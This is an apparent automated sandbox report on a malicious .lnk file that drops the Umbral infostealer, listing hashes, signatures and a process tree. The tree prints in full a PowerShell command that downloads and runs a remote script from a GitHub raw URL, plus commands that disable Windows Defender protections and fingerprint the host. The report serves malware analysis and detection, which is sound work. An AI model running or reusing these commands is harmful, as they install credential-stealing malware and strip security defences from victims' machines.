Resubmissions
23/03/2025, 14:55
250323-san3jsyjv6 1023/03/2025, 14:54
250323-r9t76sxr17 1023/03/2025, 14:51
250323-r74zlaxrv8 10Analysis
-
max time kernel
39s -
max time network
41s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
23/03/2025, 14:54
Static task
static1
General
-
Target
1231321312.lnk
-
Size
2KB
-
MD5
a83ed03220cbc79bcbcaae9a57d0b95a
-
SHA1
062d88505a421b491c8614ccff1d8fdd34453e18
-
SHA256
c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033
-
SHA512
97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00080000000240ac-21.dat family_umbral behavioral1/memory/5068-30-0x000001A6D1690000-0x000001A6D16D0000-memory.dmp family_umbral -
Umbral family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 2612 powershell.exe 13 2612 powershell.exe -
pid Process 2612 powershell.exe 4800 powershell.exe 4524 powershell.exe 3756 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-869607583-2483572573-2297019986-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 5068 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 5 raw.githubusercontent.com 7 raw.githubusercontent.com 41 discord.com 42 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 38 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3452 wmic.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2612 powershell.exe 2612 powershell.exe 4800 powershell.exe 4800 powershell.exe 4524 powershell.exe 4524 powershell.exe 3756 powershell.exe 3756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe Token: SeDebugPrivilege 5068 Umbral.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4524 powershell.exe Token: SeIncreaseQuotaPrivilege 1884 wmic.exe Token: SeSecurityPrivilege 1884 wmic.exe Token: SeTakeOwnershipPrivilege 1884 wmic.exe Token: SeLoadDriverPrivilege 1884 wmic.exe Token: SeSystemProfilePrivilege 1884 wmic.exe Token: SeSystemtimePrivilege 1884 wmic.exe Token: SeProfSingleProcessPrivilege 1884 wmic.exe Token: SeIncBasePriorityPrivilege 1884 wmic.exe Token: SeCreatePagefilePrivilege 1884 wmic.exe Token: SeBackupPrivilege 1884 wmic.exe Token: SeRestorePrivilege 1884 wmic.exe Token: SeShutdownPrivilege 1884 wmic.exe Token: SeDebugPrivilege 1884 wmic.exe Token: SeSystemEnvironmentPrivilege 1884 wmic.exe Token: SeRemoteShutdownPrivilege 1884 wmic.exe Token: SeUndockPrivilege 1884 wmic.exe Token: SeManageVolumePrivilege 1884 wmic.exe Token: 33 1884 wmic.exe Token: 34 1884 wmic.exe Token: 35 1884 wmic.exe Token: 36 1884 wmic.exe Token: SeIncreaseQuotaPrivilege 1884 wmic.exe Token: SeSecurityPrivilege 1884 wmic.exe Token: SeTakeOwnershipPrivilege 1884 wmic.exe Token: SeLoadDriverPrivilege 1884 wmic.exe Token: SeSystemProfilePrivilege 1884 wmic.exe Token: SeSystemtimePrivilege 1884 wmic.exe Token: SeProfSingleProcessPrivilege 1884 wmic.exe Token: SeIncBasePriorityPrivilege 1884 wmic.exe Token: SeCreatePagefilePrivilege 1884 wmic.exe Token: SeBackupPrivilege 1884 wmic.exe Token: SeRestorePrivilege 1884 wmic.exe Token: SeShutdownPrivilege 1884 wmic.exe Token: SeDebugPrivilege 1884 wmic.exe Token: SeSystemEnvironmentPrivilege 1884 wmic.exe Token: SeRemoteShutdownPrivilege 1884 wmic.exe Token: SeUndockPrivilege 1884 wmic.exe Token: SeManageVolumePrivilege 1884 wmic.exe Token: 33 1884 wmic.exe Token: 34 1884 wmic.exe Token: 35 1884 wmic.exe Token: 36 1884 wmic.exe Token: SeIncreaseQuotaPrivilege 4536 wmic.exe Token: SeSecurityPrivilege 4536 wmic.exe Token: SeTakeOwnershipPrivilege 4536 wmic.exe Token: SeLoadDriverPrivilege 4536 wmic.exe Token: SeSystemProfilePrivilege 4536 wmic.exe Token: SeSystemtimePrivilege 4536 wmic.exe Token: SeProfSingleProcessPrivilege 4536 wmic.exe Token: SeIncBasePriorityPrivilege 4536 wmic.exe Token: SeCreatePagefilePrivilege 4536 wmic.exe Token: SeBackupPrivilege 4536 wmic.exe Token: SeRestorePrivilege 4536 wmic.exe Token: SeShutdownPrivilege 4536 wmic.exe Token: SeDebugPrivilege 4536 wmic.exe Token: SeSystemEnvironmentPrivilege 4536 wmic.exe Token: SeRemoteShutdownPrivilege 4536 wmic.exe Token: SeUndockPrivilege 4536 wmic.exe Token: SeManageVolumePrivilege 4536 wmic.exe Token: 33 4536 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3784 wrote to memory of 2612 3784 cmd.exe 90 PID 3784 wrote to memory of 2612 3784 cmd.exe 90 PID 2612 wrote to memory of 5068 2612 powershell.exe 99 PID 2612 wrote to memory of 5068 2612 powershell.exe 99 PID 5068 wrote to memory of 4800 5068 Umbral.exe 100 PID 5068 wrote to memory of 4800 5068 Umbral.exe 100 PID 5068 wrote to memory of 4524 5068 Umbral.exe 102 PID 5068 wrote to memory of 4524 5068 Umbral.exe 102 PID 5068 wrote to memory of 1884 5068 Umbral.exe 105 PID 5068 wrote to memory of 1884 5068 Umbral.exe 105 PID 5068 wrote to memory of 4536 5068 Umbral.exe 107 PID 5068 wrote to memory of 4536 5068 Umbral.exe 107 PID 5068 wrote to memory of 4932 5068 Umbral.exe 109 PID 5068 wrote to memory of 4932 5068 Umbral.exe 109 PID 5068 wrote to memory of 3756 5068 Umbral.exe 111 PID 5068 wrote to memory of 3756 5068 Umbral.exe 111 PID 5068 wrote to memory of 3452 5068 Umbral.exe 113 PID 5068 wrote to memory of 3452 5068 Umbral.exe 113
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4524
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4536
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:4932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3756
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:3452
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD56de151c2a03149e5969163e29f43e022
SHA196b3cd620fb2b3b62686b14d2e8ddb0c865759ef
SHA256b570c29f7691fc5e4bca51caf9ed72175c6d5df058c5800091a34de6c512b2e4
SHA5120dbd4f4595570c3edc4c88c21f4b0cfe54cd49f1ce1d8379e1452573ced149326a5654ec333efbc530b8414f9feef048d6fec2642f2417fa6679f0303a043906
-
Filesize
944B
MD5f994815edea79688903f374b373848cc
SHA1122c649520fa4e5f9ee602ead7748cab2448deb1
SHA25663c62fe05e690671d433399df8565a0a99d6a9d9708fc8033b8d196b672ccda4
SHA512b8e9e749a88a3b8f728fddcaf6353345e8e53b2a1fc8b06f182745907c53c106bf3a530846031619d9a6c2b94a7d0468d05389e84087f447e3f377154a9e12d3
-
Filesize
948B
MD52af06a6b36db9473e4a7d9c7ab72b70b
SHA18ef34b9b961e51bdd1b8d7d9db2ec1b0a4764645
SHA25618a2aa7e245c6732f95fb7749b2b4d29007f2c56a9c5bfbc5e3c127bdfe5f158
SHA5123495567a5d5af94ae27be51313d9e2630c52017d808042fe0d56baa34fa1d246eb15c253d14c77c77a1d8f2f1c81680e623044ae95415b095696e7fa141ac7cf
-
Filesize
227KB
MD568b35208a6ccc5cf6cfa41f86712e7ab
SHA134c735c3cc8fd7f9d225cd7323e5632aa772f465
SHA2564a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279
SHA512f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82